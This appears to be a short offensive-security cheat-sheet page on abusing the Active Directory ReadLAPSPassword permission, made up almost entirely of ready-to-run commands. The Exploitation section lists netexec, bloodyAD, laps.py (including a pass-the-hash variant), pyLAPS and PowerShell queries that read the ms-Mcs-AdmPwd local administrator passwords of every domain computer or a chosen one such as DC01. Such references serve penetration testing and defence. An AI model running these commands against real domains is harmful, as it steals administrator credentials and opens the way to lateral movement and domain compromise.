ReadLAPSPassword
Information
LAPS is a Windows feature that automatically manages and backs up the password of a local administrator account on Windows Server AD-joined devices
Exploitation
Linux
# read the password of all computers
nxc ldap <ip> -u <user> -p <pass> -M laps
# read the password of a specific computer
nxc ldap <ip> -u <user> -p <pass> -M laps -o COMPUTER='DC01$'bloodyAD -u <user> -d <domain> -p <pass> --host <ip> get object 'COMPUTER$' --attr ms-Mcs-AdmPwd# basic usage
python laps.py -u <user> -p <pass> -d <domain>
# PtH on specific LDAP server
python laps.py -u <user> -p <hash> -d <domain> -l <fqdn># read the password of all computers
pyLAPS.py --action get -u <user> -d <domain> -p <pass> --dc-ip <ip>
# read the password of a specific computer
pyLAPS.py --action get --computer 'DC01$' -u <user> -d <domain> -p <pass> --dc-ip <ip>For an example of reading the LAPS password with NXC check Timelapse.
Windows
Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'Get-DomainComputer "DC01" -Properties 'cn','ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'Resources
Last updated
Was this helpful?